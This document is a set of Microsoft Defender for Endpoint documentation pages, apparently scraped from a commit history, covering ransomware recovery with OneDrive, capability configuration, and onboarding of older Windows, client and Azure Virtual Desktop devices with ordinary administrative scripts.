OneDrive](/OneDrive/manage-sharing).-
-**But did you know there are good security reasons to use Microsoft Defender Antivirus together with Office 365**? Here are two:
-
- 1. [You get ransomware protection and recovery](#ransomware-protection-and-recovery).
-
- 2. [Integration means better protection](#integration-means-better-protection).
-
-Read the following sections to learn more.
-
-## Ransomware protection and recovery
-
-When you save your files to [OneDrive](/onedrive), and [Microsoft Defender Antivirus](./microsoft-defender-antivirus-in-windows-10.md) detects a ransomware threat on your device, the following things occur:
-
-1. **You are told about the threat**. (If your organization is using [Microsoft Defender for Endpoint](microsoft-defender-endpoint.md), your security operations team is notified, too.)
-
-2. **Microsoft Defender Antivirus helps you (and your organization's security team) remove the ransomware** from your device(s). (If your organization is using Microsoft Defender for Endpoint, your security operations team can determine whether other devices are infected and take appropriate action, too.)
-
-3. **You get the option to recover your files in OneDrive**. With the OneDrive Files Restore feature, you can recover your files in OneDrive to the state they were in before the ransomware attack occurred. See [Ransomware detection and recovering your files](https://support.office.com/article/0d90ec50-6bfd-40f4-acc7-b8c12c73637f).
-
-Think of the time and hassle this can save.
-
-## Integration means better protection
-
-Microsoft Defender for Office 365 integrated with Microsoft Defender for Endpoint means better protection for your organization. Here's how:
--- [Microsoft Defender for Office 365](/microsoft-365/security/office-365-security/defender-for-office-365) safeguards your organization against malicious threats posed in email messages, email attachments, and links (URLs) in Office documents.-
- AND
--- [Microsoft Defender for Endpoint](microsoft-defender-endpoint.md) protects your devices from cyber threats, detects advanced attacks and data breaches, automates security incidents, and improves your security posture.-
- SO
--- Your security operations team can see a list of devices that are used by the recipients of any detected URLs or email messages, along with recent alerts for those devices, in the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>.-
-## More good reasons to use OneDrive
-
-Protection from ransomware is one great reason to put your files in OneDrive. And there are several more good reasons, summarized in this video: <br/><br/>
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/70b4d256-46fb-481f-ad9b-921ef5fd7bed]
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
-## Want to learn more? See these resources:
--- [OneDrive](/onedrive)--- [Microsoft Defender for Office 365](/microsoft-365/security/office-365-security/defender-for-office-365)--- [Microsoft Defender for Endpoint](microsoft-defender-endpoint.md)--
security Onboard Configure https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboard-configure.md
- Title: Onboard devices and configure Microsoft Defender for Endpoint capabilities
-description: Onboard Windows 10 and Windows 11 devices, servers, non-Windows devices and learn how to run a detection test.
------- m365-security-- tier2-- Previously updated : 03/28/2024--
-# Configure Microsoft Defender for Endpoint capabilities
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-onboardconfigure-abovefoldlink)
-
-In this step, you're ready to configure Microsoft Defender for Endpoint capabilities.
-
-## Configure capabilities
-
-In many cases, organizations have existing endpoint security products in place. The bare minimum being an antivirus solution, but in some cases, an organization might have existing endpoint detection and response solution.
-
-It's common that Defender for Endpoint needs to exist along side these existing endpoint security products either indefinitely or during a cutover period. Fortunately, Defender for Endpoint and the endpoint security suite is modular and can be adopted in a systematic approach.
-
-Onboarding devices effectively enables the endpoint detection and response capability of Microsoft Defender for Endpoint. After onboarding the devices, you'll then need to configure the other capabilities of the service. The following table lists the capabilities you can configure to get the best protection for your environment and the order Microsoft recommends for how the endpoint security suite should be enabled.
--
-| Capability | Description |Adoption Order Rank|
-||||
-|[Endpoint Detection & Response (EDR)](overview-endpoint-detection-response.md)|Defender for Endpoint endpoint detection and response capabilities provide advanced attack detections that are near real-time and actionable. Security analysts can prioritize alerts effectively, gain visibility into the full scope of a breach, and take response actions to remediate threats. <p>|1|
-| [Configure Microsoft Defender Vulnerability Management](../defender-vulnerability-management/tvm-prerequisites.md) | Defender Vulnerability Management is a component of Microsoft Defender for Endpoint, and provides both security administrators and security operations teams with unique value, including: <br><br> - Real-time endpoint detection and response (EDR) insights correlated with endpoint vulnerabilities. <br><br> - Invaluable device vulnerability context during incident investigations. <br><br> - Built-in remediation processes through Microsoft Intune and Microsoft System Center Configuration Manager.|2|
-| [Configure Next-generation protection (NGP)](configure-microsoft-defender-antivirus-features.md) | Microsoft Defender Antivirus is a built-in antimalware solution that provides next-generation protection for desktops, portable computers, and servers. Microsoft Defender Antivirus includes:<br> <br>-Cloud-delivered protection for near-instant detection and blocking of new and emerging threats. Along with machine learning and the Intelligent Security Graph, cloud-delivered protection is part of the next-gen technologies that power Microsoft Defender Antivirus.<br> <br> - Always-on scanning using advanced file and process behavior monitoring and other heuristics (also known as "real-time protection").<br><br> - Dedicated protection updates based on machine learning, human and automated big-data analysis, and in-depth threat resistance research. |3|
-| [Configure attack surface reduction](overview-attack-surface-reduction.md) | Attack surface reduction capabilities in Microsoft Defender for Endpoint help protect the devices and applications in the organization from new and emerging threats. |4|
-| [Configure Auto Investigation & Remediation (AIR) capabilities](configure-automated-investigations-remediation.md) | Microsoft Defender for Endpoint uses Automated investigations to significantly reduce the volume of alerts that need to be investigated individually. The Automated investigation feature uses various inspection algorithms, and processes used by analysts (such as playbooks) to examine alerts and take immediate remediation action to resolve breaches. AIR significantly reduces alert volume, allowing security operations experts to focus on more sophisticated threats and other high value initiatives.|Not applicable|
-| [Configure Microsoft Defender Experts capabilities](../defender/defender-experts-for-hunting.md) | Microsoft Experts is a managed hunting service that provides Security Operation Centers (SOCs) with expert level monitoring and analysis to help them ensure that critical threats in their unique environments don't get missed.|Not applicable|
-
-For more information, see [Supported Microsoft Defender for Endpoint capabilities by platform](supported-capabilities-by-platform.md).
security Onboard Downlevel https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboard-downlevel.md
- Title: Onboard previous versions of Windows on Microsoft Defender for Endpoint
-description: Onboard supported previous versions of Windows devices so that they can send sensor data to the Microsoft Defender for Endpoint sensor
-------- m365-security-- tier2-- Previously updated : 12/18/2020--
-# Onboard previous versions of Windows
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-**Platforms**
--- Windows 7 SP1 Enterprise-- Windows 7 SP1 Pro-- Windows 8.1 Pro-- Windows 8.1 Enterprise-- Windows Server 2008 R2 SP1-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-downlevel-abovefoldlink)
-
-Defender for Endpoint extends support to include down-level operating systems, providing advanced attack detection and investigation capabilities on supported Windows versions.
-
-To onboard down-level Windows client endpoints to Defender for Endpoint, you'll need to:
--- [Configure and update System Center Endpoint Protection clients](#configure-and-update-system-center-endpoint-protection-clients)-- [Install and configure Microsoft Monitoring Agent (MMA) to report sensor data](#install-and-configure-microsoft-monitoring-agent-mma)-
-For Windows Server 2008 R2 SP1, you have the option of [onboarding through Microsoft Defender for Cloud](#onboard-windows-servers-through-microsoft-defender-for-cloud).
-
-> [!NOTE]
-> Defender for Endpoint standalone server license is required, per node, in order to onboard a Windows server through Microsoft Monitoring Agent (Option 1). Alternatively, a Microsoft Defender for servers license is required, per node, in order to onboard a Windows server through Microsoft Defender for Cloud (Option 2), see [Supported features available in Microsoft Defender for Cloud](/azure/defender-for-cloud/supported-machines-endpoint-solutions-clouds-servers).
-
-> [!TIP]
-> After onboarding the device, you can choose to run a detection test to verify that it is properly onboarded to the service. For more information, see [Run a detection test on a newly onboarded Defender for Endpoint endpoint](run-detection-test.md).
-
-## Configure and update System Center Endpoint Protection clients
-
-Defender for Endpoint integrates with System Center Endpoint Protection to provide visibility to malware detections and to stop propagation of an attack in your organization by banning potentially malicious files or suspected malware.
-
-The following steps are required to enable this integration:
--- Install the [January 2017 anti-malware platform update for Endpoint Protection clients](https://support.microsoft.com/help/3209361/january-2017-anti-malware-platform-update-for-endpoint-protection-clie)-- Configure the SCEP client Cloud Protection Service membership to the **Advanced** setting-- Configure your network to allow connections to the Microsoft Defender Antivirus cloud. For more information, see [Configure and validate Microsoft Defender Antivirus network connections](/microsoft-365/security/defender-endpoint/configure-network-connections-microsoft-defender-antivirus)-
-## Install and configure Microsoft Monitoring Agent (MMA)
-
-### Before you begin
-
-Review the following details to verify minimum system requirements:
--- Install the [February 2018 monthly update rollup](https://support.microsoft.com/help/4074598/windows-7-update-kb4074598) - Direct download link from the Windows Update catalog is available [here](https://www.catalog.update.microsoft.com/Search.aspx?q=KB4074598)--- Install the [March 12, 2019 (or later) Servicing stack update](https://support.microsoft.com/topic/servicing-stack-update-for-windows-7-sp1-and-windows-server-2008-r2-sp1-march-12-2019-b4dc0cff-d4f2-a408-0cb1-cb8e918feeba) - Direct download link from the Windows Update catalog is available [here](https://www.catalog.update.microsoft.com/search.aspx?q=4490628)--- Install the [SHA-2 code signing support update](https://support.microsoft.com/topic/sha-2-code-signing-support-update-for-windows-server-2008-r2-windows-7-and-windows-server-2008-september-23-2019-84a8aad5-d8d9-2d5c-6d78-34f9aa5f8339) - Direct download link from the Windows Update catalog is available [here](https://www.catalog.update.microsoft.com/search.aspx?q=kb4474419)-
- > [!NOTE]
- > Only applicable for Windows Server 2008 R2, Windows 7 SP1 Enterprise, and Windows 7 SP1 Pro.
--- Install the [Update for customer experience and diagnostic telemetry](https://support.microsoft.com/help/3080149/update-for-customer-experience-and-diagnostic-telemetry)--- Install [Microsoft .Net Framework 4.5.2 or later](https://www.microsoft.com/en-US/download/details.aspx?id=42642)-
- > [!NOTE]
- > Installation of .NET 4.5 might require you to restart your computer after installation.
--- Meet the Azure Log Analytics agent minimum system requirements. For more information, see [Collect data from computers in you environment with Log Analytics](/azure/log-analytics/log-analytics-concept-hybrid#prerequisites)-
-### Installation steps
-
-1. Download the agent setup file: [Windows 64-bit agent](https://go.microsoft.com/fwlink/?LinkId=828603) or [Windows 32-bit agent](https://go.microsoft.com/fwlink/?LinkId=828604).
-
- > [!NOTE]
- > Due to the [deprecation of SHA-1 support by the MMA agent](/azure/azure-monitor/agents/agent-windows#sha-2-code-signing-support-requirement), the MMA agent needs to be version 10.20.18029 or newer.
-
-2. Obtain the workspace ID:
- - In the Defender for Endpoint navigation pane, select **Settings > Device management > Onboarding**
- - Select the operating system
- - Copy the workspace ID and workspace key
-
-3. Using the Workspace ID and Workspace key choose any of the following installation methods to install the agent:
- - [Manually install the agent using setup](/azure/log-analytics/log-analytics-windows-agents#install-agent-using-setup-wizard).
-
- On the **Agent Setup Options** page, select **Connect the agent to Azure Log Analytics (OMS)**
-
- - [Install the agent using the command line](/azure/log-analytics/log-analytics-windows-agents#install-agent-using-command-line).
- - [Configure the agent using a script](/azure/log-analytics/log-analytics-windows-agents#install-agent-using-dsc-in-azure-automation).
-
- > [!NOTE]
- > If you are a [US Government customer](gov.md), under "Azure Cloud" you'll need to choose "Azure US Government" if using the setup wizard, or if using a command line or a script - set the "OPINSIGHTS_WORKSPACE_AZURE_CLOUD_TYPE" parameter to 1.
-
-4. If you're using a proxy to connect to the Internet see the Configure proxy and Internet connectivity settings section.
-
-Once completed, you should see onboarded endpoints in the portal within an hour.
-
-## Configure proxy and Internet connectivity settings
-
-If your servers need to use a proxy to communicate with Defender for Endpoint, use one of the following methods to configure the MMA to use the proxy server:
--- [Configure the MMA to use a proxy server](/azure/azure-monitor/platform/agent-windows#install-agent-using-setup-wizard)--- [Configure Windows to use a proxy server for all connections](configure-proxy-internet.md)-
-If a proxy or firewall is in use, please ensure that servers can access all of the Microsoft Defender for Endpoint service URLs directly and without SSL interception. For more information, see [enable access to Microsoft Defender for Endpoint service URLs](configure-environment.md#enable-access-to-microsoft-defender-for-endpoint-service-urls-in-the-proxy-server). Use of SSL interception will prevent the system from communicating with the Defender for Endpoint service.
-
-Once completed, you should see onboarded Windows servers in the portal within an hour.
-
-## Onboard Windows servers through Microsoft Defender for Cloud
-
-1. In the Microsoft Defender XDR navigation pane, select **Settings** > **Endpoints** > **Device management** > **Onboarding**.
-
-2. Select **Windows Server 2008 R2 SP1** as the operating system.
-
-3. Click **Onboard Servers in Microsoft Defender for Cloud**.
-
-4. Follow the onboarding instructions in [Microsoft Defender for Endpoint with Microsoft Defender for Cloud](/azure/security-center/security-center-wdatp) and If you are using Azure ARC, follow the onboarding instructions in [Enabling the Microsoft Defender for Endpoint integration](/azure/security-center/security-center-wdatp#enabling-the-microsoft-defender-for-endpoint-integration).
-
-After completing the onboarding steps, you'll need to [Configure and update System Center Endpoint Protection clients](#configure-and-update-system-center-endpoint-protection-clients).
-
-> [!NOTE]
->
-> - For onboarding via Microsoft Defender for servers to work as expected, the server must have an appropriate workspace and key configured within the Microsoft Monitoring Agent (MMA) settings.
-> - Once configured, the appropriate cloud management pack is deployed on the machine and the sensor process (MsSenseS.exe) will be deployed and started.
-> - This is also required if the server is configured to use an OMS Gateway server as proxy.
-
-## Verify onboarding
-
-Verify that Microsoft Defender Antivirus and Microsoft Defender for Endpoint are running.
-
-> [!NOTE]
-> Running Microsoft Defender Antivirus is not required but it is recommended. If another antivirus vendor product is the primary endpoint protection solution, you can run Defender Antivirus in Passive mode. You can only confirm that passive mode is on after verifying that Microsoft Defender for Endpoint sensor (SENSE) is running.
-
-> [!NOTE]
-> As Microsoft Defender Antivirus is only supported for Windows 10 and Windows 11, step 1 does not apply when running Windows Server 2008 R2 SP1.
-
-1. Run the following command to verify that Microsoft Defender Antivirus is installed:
-
- ```dos
- sc.exe query Windefend
- ```
-
- If the result is 'The specified service doesn't exist as an installed service', then you'll need to install Microsoft Defender Antivirus. For more information, see [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-windows.md).
-
- For information on how to use Group Policy to configure and manage Microsoft Defender Antivirus on your Windows servers, see [Use Group Policy settings to configure and manage Microsoft Defender Antivirus](use-group-policy-microsoft-defender-antivirus.md).
-
-If you encounter issues with onboarding, see [Troubleshoot onboarding](troubleshoot-onboarding.md).
-
-## Run a detection test
-
-Follow the steps in [Run a detection test on a newly onboarded device](run-detection-test.md) to verify that the server is reporting to Defender for the Endpoint service.
-
-## Onboarding endpoints with no management solution
-
-### Using Group Policy
-
-**Step 1: Download the corresponding update for your endpoint.**
-
-1. Navigate to c:\windows\sysvol\domain\scripts (Change control could be needed on one of the domain controllers.)
-1. Create a folder named MMA.
-1. Download the following and place them in the MMA folder:
-
- - Update for customer experience and diagnostic telemetry:
- - [For Windows Server 2008 R2 x64](https://www.microsoft.com/download/details.aspx?familyid=1bd1d18d-4631-4d8e-a897-327925765f71)
-
- For Windows Server 2008 R2 SP1, following updates are also required:
-
- February 2018 Monthly Roll up - KB4074598 (Windows Server 2008 R2)
-
- [Microsoft Update Catalog](https://www.catalog.update.microsoft.com/Search.aspx?q=KB4074598)<br>
- Download updates for Windows Server 2008 R2 x64
-
- .NET Framework 3.5.1 (KB315418)<br>
- [For Windows Server 2008 R2 x64](/iis/install/installing-iis-7/install-windows-server-2008-and-windows-server-2008-r2)
-
- > [!NOTE]
- > This article assumes you are using x64-based servers (MMA Agent .exe x64 New SHA-2 compliant version).
-
-**Step 2: Create a file name DeployMMA.cmd (using notepad)**
-Add the following lines to the cmd file. Note that you'll need your WORKSPACE ID and KEY.
-
-The following command is an example. Replace the following values:
--- KB - Use the applicable KB relevant to the endpoint you're onboarding-- Workspace ID and KEY - Use your ID and key-
-```dos
-@echo off
-cd "C:"
-IF EXIST "C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe" (
-exit
-) ELSE (
-
-wusa.exe C:\Windows\MMA\Windows6.1-KB3080149-x64.msu /quiet /norestart
-wusa.exe C:\Windows\MMA\Windows6.1-KB4074598-x64.msu /quiet /norestart
-wusa.exe C:\Windows\MMA\Windows6.1-KB3154518-x64.msu /quiet /norestart
-wusa.exe C:\Windows\MMA\Windows8.1-KB3080149-x64.msu /quiet /norestart
-"c:\windows\MMA\MMASetup-AMD64.exe" /c /t:"C:\Windows\MMA"
-c:\windows\MMA\setup.exe /qn NOAPM=1 ADD_OPINSIGHTS_WORKSPACE=1 OPINSIGHTS_WORKSPACE_ID="<your workspace ID>" OPINSIGHTS_WORKSPACE_KEY="<your workspace key>" AcceptEndUserLicenseAgreement=1
-
-)
-```
-
-### Group Policy Configuration
-
-Create a new group policy specifically for onboarding devices such as "Microsoft Defender for Endpoint Onboarding".
--- Create a Group Policy Folder named "c:\windows\MMA"-
- :::image type="content" source="media/grppolicyconfig1.png" alt-text="The folders location" lightbox="media/grppolicyconfig1.png":::
-
- **This will add a new folder on every server that gets the GPO applied, called MMA, and will be stored in c:\windows. This will contain the installation files for the MMA, prerequisites, and install script.**
--- Create a Group Policy Files preference for each of the files stored in Net logon.-
- :::image type="content" source="media/grppolicyconfig2.png" alt-text="The group policy - 1" lightbox="media/grppolicyconfig2.png":::
-
-It copies the files from DOMAIN\NETLOGON\MMA\filename to
-C:\windows\MMA\filename - **so the installation files are local to the server**:
--
-Repeat the process but create item level targeting on the COMMON tab, so the file only gets copied to the appropriate platform/Operating system version in scope:
--
-For Windows Server 2008 R2 you'll need (and it will only copy down) the following:
--- Windows6.1-KB3080149-x64.msu-- Windows6.1-KB3154518-x64.msu-- Windows6.1-KB4075598-x64.msu-
-Once this is done, you'll need to create a start-up script policy:
--
-The name of the file to run here is c:\windows\MMA\DeployMMA.cmd.
-Once the server is restarted as part of the start-up process it will install the Update for customer experience and diagnostic telemetry KB, and then install the MMA Agent, while setting the Workspace ID and Key, and the server will be onboarded.
-
-You could also use an **immediate task** to run the deployMMA.cmd if you don't want to reboot all the servers.
-
-This could be done in two phases. First create **the files and the folder in** GPO - Give the system time to ensure the GPO has been applied, and all the servers have the install files. Then, add the immediate task. This will achieve the same result without requiring a reboot.
-
-As the Script has an exit method and won't re-run if the MMA is installed, you could also use a daily scheduled task to achieve the same result. Similar to a Configuration Manager compliance policy it will check daily to ensure the MMA is present.
-----
-As mentioned in the onboarding documentation for Server specifically around Server 2008 R2 please see below:
-For Windows Server 2008 R2 SP1, ensure that you fulfill the following requirements:
--- Install the [February 2018 monthly update rollup](https://support.microsoft.com/help/4074598/windows-7-update-kb4074598)-- Install either [.NET framework 4.5](https://www.microsoft.com/download/details.aspx?id=30653) (or later) or [KB3154518](https://support.microsoft.com/help/3154518/support-for-tls-system-default-versions-included-in-the-net-framework)-
-Please check the KBs are present before onboarding Windows Server 2008 R2. This process allows you to onboard all the servers if you don't have Configuration Manager managing Servers.
-
-## Offboard endpoints
-
-You have two options to offboard Windows endpoints from the service:
--- Uninstall the MMA agent-- Remove the Defender for Endpoint workspace configuration-
-> [!NOTE]
-> Offboarding causes the Windows endpoint to stop sending sensor data to the portal but data from the endpoint, including reference to any alerts it has had will be retained for up to 6 months.
-
-### Uninstall the MMA agent
-
-To offboard the Windows endpoint, you can uninstall the MMA agent or detach it from reporting to your Defender for Endpoint workspace. After offboarding the agent, the endpoint will no longer send sensor data to Defender for Endpoint.
-For more information, see [To disable an agent](/azure/log-analytics/log-analytics-windows-agents#to-disable-an-agent).
-
-### Remove the Defender for Endpoint workspace configuration
-
-You can use either of the following methods:
--- Remove the Defender for Endpoint workspace configuration from the MMA agent-- Run a PowerShell command to remove the configuration-
-#### Remove the Defender for Endpoint workspace configuration from the MMA agent
-
-1. In the **Microsoft Monitoring Agent Properties**, select the **Azure Log Analytics (OMS)** tab.
-
-2. Select the Defender for Endpoint workspace, and click **Remove**.
-
- :::image type="content" source="media/atp-mma.png" alt-text="The Workspaces pane" lightbox="media/atp-mma.png":::
-
-#### Run a PowerShell command to remove the configuration
-
-1. Get your Workspace ID:
-
- 1. In the navigation pane, select **Settings** > **Onboarding**.
- 1. Select the relevant operating system and get your Workspace ID.
-
-2. Open an elevated PowerShell and run the following command. Use the Workspace ID you obtained and replacing `WorkspaceID`:
-
- ```powershell
- $AgentCfg = New-Object -ComObject AgentConfigManager.MgmtSvcCfg
-
- # Remove OMS Workspace
- $AgentCfg.RemoveCloudWorkspace("WorkspaceID")
-
- # Reload the configuration and apply changes
- $AgentCfg.ReloadConfiguration()
- ```
security Onboard Windows Client https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboard-windows-client.md
- Title: Defender for Endpoint onboarding Windows Client
-description: Onboard Windows Client devices to Microsoft Defender for Endpoint.
------- m365-security-- tier2-- Previously updated : 04/03/2024--
-# Defender for Endpoint onboarding Windows client devices
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Endpoint data loss prevention (DLP)](/microsoft-365/compliance/endpoint-dlp-learn-about)-- [Insider risk management](/microsoft-365/compliance/insider-risk-management)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https:%2F%2Faka.ms%2FMDEp2OpenTrial)
-
-To onboard Windows client devices, follow the onboarding steps in the [Microsoft Defender portal](https://security.microsoft.com) (Go to **Settings** > **Endpoints** > **Onboarding**). You can onboard any of the supported devices. Depending on the particular device, you're guided ny appropriate steps and are provided with management and deployment tool options suitable for the device.
-
-Devices in your organization must be configured so that the Defender for Endpoint service can get sensor data from them. There are various methods and deployment tools that you can use to configure the devices in your organization. In general, you identify the client you're onboarding, then follow the corresponding tool appropriate to the device or your environment.
---
-## Related articles
--- [Onboard Windows devices using Microsoft Intune](configure-endpoints-mdm.md)-- [Onboard Windows devices using Group Policy](configure-endpoints-gp.md)-- [Onboard Windows devices using a local script](configure-endpoints-script.md)-- [Onboard non-persistent virtual desktop infrastructure (VDI) devices](configure-endpoints-vdi.md)-
security Onboard Windows Multi Session Device https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboard-windows-multi-session-device.md
- Title: Onboard Windows devices in Azure Virtual Desktop
-description: Learn about onboarding Windows devices to Defender for Endpoint in Azure Virtual Desktop
---------- m365-security-- tier3- Previously updated : 01/18/2024--
-# Onboard Windows devices in Azure Virtual Desktop
-
-6 minutes to read
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Windows multi-session running on Azure Virtual Desktop (AVD)-- [Windows 10 Enterprise Multi-Session](/azure/virtual-desktop/windows-10-multisession-faq)-
-Microsoft Defender for Endpoint supports monitoring both VDI and Azure Virtual Desktop sessions. Depending on your organization's needs, you might need to implement VDI or Azure Virtual Desktop sessions to help your employees access corporate data and apps from an unmanaged device, remote location, or similar scenario. With Microsoft Defender for Endpoint, you can monitor these virtual machines for anomalous activity.
-
-## Before you begin
-
-Familiarize yourself with the [considerations for non-persistent VDI](/microsoft-365/security/defender-endpoint/configure-endpoints-vdi#onboard-non-persistent-virtual-desktop-infrastructure-vdi-devices-1). While [Azure Virtual Desktop](/azure/virtual-desktop/overview) doesn't provide non-persistence options, it does provide ways to use a golden Windows image that can be used to provision new hosts and redeploy machines. This increases volatility in the environment and thus impacts what entries are created and maintained in the Microsoft Defender for Endpoint portal, potentially reducing visibility for your security analysts.
-
-> [!NOTE]
-> Depending on your choice of onboarding method, devices can appear in Microsoft Defender for Endpoint portal as either:
->
-> - Single entry for each virtual desktop
-> - Multiple entries for each virtual desktop
-
-Microsoft recommends onboarding Azure Virtual Desktop as a single entry per virtual desktop. This ensures that the investigation experience in the Microsoft Defender for Endpoint portal is in the context of one device based on the machine name. Organizations that frequently delete and redeploy AVD hosts should strongly consider using this method as it prevents multiple objects for the same machine from being created in the Microsoft Defender for Endpoint portal. This can lead to confusion when investigating incidents. For test or non-volatile environments, you may opt to choose differently.
-
-Microsoft recommends adding the Microsoft Defender for Endpoint onboarding script to the AVD golden image. This way, you can be sure that this onboarding script runs immediately at first boot. It's executed as a startup script at first boot on all the AVD machines that are provisioned from the AVD golden image. However, if you're using one of the gallery images without modification, place the script in a shared location and call it from either local or domain group policy.
-
-> [!NOTE]
-> The placement and configuration of the VDI onboarding startup script on the AVD golden image configures it as a startup script that runs when the AVD starts. It's **not** recommended to onboard the actual AVD golden image. Another consideration is the method used to run the script. It should run as early in the startup/provisioning process as possible to reduce the time between the machine being available to receive sessions and the device onboarding to the service. Below scenarios 1 and 2 take this into account.
-
-### Scenarios
-
-There are several ways to onboard an AVD host machine:
--- Run the script in the golden image (or from a shared location) during startup.-- Use a management tool to run the script.-- Through [Integration with Microsoft Defender for Cloud](azure-server-integration.md)-
-#### *Scenario 1: Using local group policy*
-
-This scenario requires placing the script in a golden image and uses local group policy to run early in the boot process.
-
-Use the instructions in [Onboard the non-persistent virtual desktop infrastructure (VDI) devices](configure-endpoints-vdi.md).
-
-Follow the instructions for a single entry for each device.
-
-#### *Scenario 2: Using domain group policy*
-
-This scenario uses a centrally located script and runs it using a domain-based group policy. You can also place the script in the golden image and run it in the same way.
-
-<a name='download-the-windowsdefenderatponboardingpackagezip-file-from-the-microsoft-365-defender-portal'></a>
-
-##### Download the WindowsDefenderATPOnboardingPackage.zip file from the Microsoft Defender portal
-
-1. Open the VDI configuration package .zip file (WindowsDefenderATPOnboardingPackage.zip)
-
- 1. In the Microsoft Defender portal navigation pane, select **Settings** \> **Endpoints** \> **Onboarding** (under **Device Management**).
- 1. Select Windows 10 or Windows 11 as the operating system.
- 1. In the **Deployment method** field, select VDI onboarding scripts for non-persistent endpoints.
- 1. Click **Download package** and save the .zip file.
-
-2. Extract the contents of the .zip file to a shared, read-only location that can be accessed by the device. You should have a folder called **OptionalParamsPolicy** and the files **WindowsDefenderATPOnboardingScript.cmd** and **Onboard-NonPersistentMachine.ps1**.
-
-##### Use Group Policy management console to run the script when the virtual machine starts
-
-1. Open the Group Policy Management Console (GPMC), right-click the Group Policy Object (GPO) you want to configure and click **Edit**.
-
-2. In the Group Policy Management Editor, go to **Computer configuration** \> **Preferences** \> **Control panel settings**.
-
-3. Right-click **Scheduled tasks**, click **New**, and then click **Immediate Task** (At least Windows 7).
-
-4. In the Task window that opens, go to the **General** tab. Under **Security options** click **Change User or Group** and type SYSTEM. Click **Check Names** and then click OK. NT AUTHORITY\SYSTEM appears as the user account the task will run as.
-
-5. Select **Run whether user is logged on or not** and check the **Run with highest privileges** check box.
-
-6. Go to the **Actions** tab and click **New**. Ensure that **Start a program** is selected in the Action field. Enter the following:
-
- `Action = "Start a program"`
-
- `Program/Script = C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe`
-
- `Add Arguments (optional) = -ExecutionPolicy Bypass -command "& \\Path\To\Onboard-NonPersistentMachine.ps1"`
-
- Then select **OK** and close any open GPMC windows.
-
-#### *Scenario 3: Onboarding using management tools*
-
-If you plan to manage your machines using a management tool, you can onboard devices with Microsoft Endpoint Configuration Manager.
-
-For more information, see [Onboard Windows devices using Configuration Manager](configure-endpoints-sccm.md).
-
-> [!WARNING]
-> If you plan to use [Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md), note that the rule "[Block process creations originating from PSExec and WMI commands](attack-surface-reduction-rules-reference.md#block-process-creations-originating-from-psexec-and-wmi-commands)" should not be used, because that rule is incompatible with management through Microsoft Endpoint Configuration Manager. The rule blocks WMI commands that the Configuration Manager client uses to function correctly.
-
-> [!TIP]
-> After onboarding the device, you can choose to run a detection test to verify that the device is properly onboarded to the service. For more information, see [Run a detection test on a newly onboarded Microsoft Defender for Endpoint device](run-detection-test.md).
-
-#### Tagging your machines when building your golden image
-
-As part of your onboarding, you may want to consider setting a machine tag to differentiate AVD machines more easily in the Microsoft Security Center. For more information, see
-[Add device tags by setting a registry key value](machine-tags.md#add-device-tags-by-setting-a-registry-key-value).
-
-#### Other recommended configuration settings
-
-When building your golden image, you may want to configure initial protection settings as well. For more information, see [Other recommended configuration settings](configure-endpoints-gp.md#other-recommended-configuration-settings).
-
-Also, if you're using FSlogix user profiles, we recommend you follow the guidance described in [FSLogix antivirus exclusions](/fslogix/overview-prerequisites#configure-antivirus-file-and-folder-exclusions).
-
-#### Licensing requirements
-
-Note on licensing: When using Windows Enterprise multi-session, depending on your requirements, you can choose to either have all users licensed through Microsoft Defender for Endpoint (per user), Windows Enterprise E5, Microsoft 365 E5 Security, or Microsoft 365 E5, or have the VM licensed through Microsoft Defender for Cloud.
